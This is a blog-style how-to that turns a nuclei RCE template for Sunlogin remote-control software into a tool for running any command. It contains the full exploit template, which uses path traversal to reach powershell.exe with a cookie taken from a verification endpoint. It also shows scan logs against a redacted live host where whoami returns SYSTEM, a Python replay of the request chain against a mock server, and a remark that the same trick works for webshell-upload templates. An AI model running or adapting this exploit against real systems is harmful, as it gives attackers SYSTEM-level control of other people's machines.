
How to use nuclei to rce with any command

November 26, 2023

A few weeks ago I realized that nuclei can run any command through an RCE template, not just the one hard-coded into it. Nuclei is a fast, customisable vulnerability scanner driven by a simple YAML-based DSL, and it finds a lot of vulnerabilities for us.

Two command-line flags are enough for this: -dresp and -V.

Flags

-dresp (alias of -debug-response) shows all received responses for all templates.

-V (alias of -var) sets custom template variables in key=value format.

nuclei template

A template can declare its own variables under the variables key and reference them anywhere in the template as {{name}}. For example:

id: sunlogin_rce

info:
  name: Sunlogin (向日葵) RCE
  author: Xc1Ym
  severity: critical
  description: Commands can be executed through this endpoint
  metadata:
    max-request: 2
    verified: true
    fofa-query1: body="Verification failure"
    fofa-query2: app="向日葵-远程控制"
  tags: rce
variables:
  # default command; override at run time with -V cmd=<command>
  cmd: "ipconfig"
http:
    - raw:
      - |
        GET /cgi-bin/rpc?action=verify-haras HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+{{cmd}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}
      # internal: the extracted verify_string is not reported, it only feeds {{cid}} in the next request
      extractors:
        - type: json
          part: body
          internal: true
          name: cid
          json:
          - '.verify_string'
      # all four conditions must hold; body_2 is the output of the command in {{cmd}}
      matchers:
        - type: dsl
          dsl:
            - "status_code_1==200"
            - "contains(body_1, 'verify_string')"
            - "status_code_2==200"
            - "contains(body_2, 'Windows IP')"
          condition: and
# digest: 490a0046304402200b08d3b3306a25fe78dc7485bc5f3f766a1189738e6d89ae775afa9ed4d3f1d1022002274e233fe7383a0c9e87f6c09ddbdad543c653e6d0592d813e76c7235eae57:ac885261be3fdd93c33050b022a2b6f1

The template sets the default of cmd to ipconfig. To run whoami instead, override it on the command line with -V cmd=whoami; nothing in the template file changes. Add -dresp as well to dump the raw responses: once you already know the host is vulnerable, that dump is where you read the command output.

PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

                projectdiscovery.io

[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[sunlogin_rce] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig

Run it again with -dresp to dump the responses to both requests.

PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp

[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras

HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html

{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig

HTTP/1.1 200 OK
Content-Length: 750
Cache-Control: no-cache
Content-Type: text/json


Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : xxx
   IPv4 Address. . . . . . . . . . . : xxx
   Subnet Mask . . . . . . . . . . . : xxx
   Default Gateway . . . . . . . . . : xxx

Tunnel adapter isatap.{xxx}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : xxx
   Link-local IPv6 Address . . . . . : xxx
   Default Gateway . . . . . . . . . : ::
[sunlogin_rce:dsl-1] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig

Finally, pass -V cmd=whoami to override the variable. The dump shows that whoami ran on the target and came back as nt authority\system. Note that nuclei prints no match line for this run: the matcher still requires 'Windows IP' in the second body, so with a different command the result is visible only in the -dresp dump unless you also adjust the matcher.

PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp -V cmd=whoami

[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras

HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html

{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

HTTP/1.1 200 OK
Content-Length: 21
Cache-Control: no-cache
Content-Type: text/json

nt authority\system
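
The following Python script is an added example, not code from this post or from nuclei: it replays what the template above does (request 1, the internal json extractor, request 2 with the CID cookie, and the and-combined DSL matchers) against a constructed in-process mock of the two endpoints, so it runs offline and executes nothing. The mock's verify string, its canned ipconfig/whoami text and the 192.0.2.10 address are made up; the PowerShell traversal path and the 'Windows IP' marker are the template's own. It also shows two things the text leaves implicit: the command has to be URL-encoded (spaces as +) before it is spliced into the query, and a command whose output lacks the 'Windows IP' marker fails the matcher exactly as the whoami run above did, so the marker is passed in alongside the command.

```python
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import Request, urlopen

# Traversal prefix from the template's second raw request, already URL-encoded.
TRAVERSAL = "ping" + "..%2F" * 9 + "windows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe"
MOCK_CID = "constructed-verify-string"  # constructed; a real host returns its own value


def build_check_path(cmd="ipconfig"):
    """Splice {{cmd}} into the /check query the way the template does.
    quote_plus turns spaces into '+', so 'whoami /all' stays one query value
    instead of breaking the raw request line the way a bare space would."""
    return f"/check?cmd={TRAVERSAL}+{quote_plus(cmd)}"


def fetch(url, headers=None):
    """GET and return (status, body) without raising on non-2xx responses."""
    try:
        with urlopen(Request(url, headers=headers or {}), timeout=5) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def run_template(base_url, cmd="ipconfig", marker="Windows IP"):
    """Replay the template: request 1, internal extractor, request 2, DSL matchers.
    Returns (matched, body_2) so the caller still sees the command output when
    the matcher fails, which is what the -dresp dump gives you in nuclei."""
    status_1, body_1 = fetch(base_url + "/cgi-bin/rpc?action=verify-haras")
    # extractor: type json, '.verify_string', internal -> {{cid}}
    try:
        cid = json.loads(body_1)["verify_string"]
    except (ValueError, KeyError):
        return False, body_1
    status_2, body_2 = fetch(base_url + build_check_path(cmd), {"Cookie": f"CID={cid}"})
    # matchers: type dsl, condition: and
    matched = (status_1 == 200 and "verify_string" in body_1
               and status_2 == 200 and marker in body_2)
    return matched, body_2


class MockSunlogin(BaseHTTPRequestHandler):
    """Constructed stand-in for the two endpoints: it runs nothing and only
    answers with canned text so the flow can be exercised offline."""

    def log_message(self, *args):  # keep the example quiet
        pass

    def _send(self, status, body, ctype="text/html"):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        url = urlparse(self.path)
        qs = parse_qs(url.query)
        if url.path == "/cgi-bin/rpc" and qs.get("action") == ["verify-haras"]:
            self._send(200, json.dumps({"__code": 0, "enabled": "1",
                                        "verify_string": MOCK_CID, "code": 0}))
        elif url.path == "/check":
            if self.headers.get("Cookie") != f"CID={MOCK_CID}":
                return self._send(401, "verification failure")
            # parse_qs already decoded %2F and '+', so split off the traversal part
            cmd = qs.get("cmd", [""])[0].split("powershell.exe ", 1)[-1]
            canned = {"ipconfig": "\nWindows IP Configuration\n\n   IPv4 Address. . . : 192.0.2.10\n",
                      "whoami": "nt authority\\system\n"}
            self._send(200, canned.get(cmd, f"unknown command: {cmd}\n"), "text/json")
        else:
            self._send(404, "not found")


def start_mock():
    """Start the mock on a random loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), MockSunlogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


if __name__ == "__main__":
    srv, base = start_mock()
    for cmd in ("ipconfig", "whoami"):
        matched, out = run_template(base, cmd)
        print(f"{cmd}: matched={matched}\n{out}")
    srv.shutdown()
```

Run it directly to see both commands: ipconfig matches, whoami does not (the output is still returned), and calling run_template(base, "whoami", marker="nt authority") makes the whoami run match, which is the equivalent of editing the matcher along with the variable.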

In the end

If you want to run an arbitrary command through an RCE template, declare the command as a variable in the template and override it at run time with -V.

The same approach works for templates that upload a webshell and then execute commands through it.
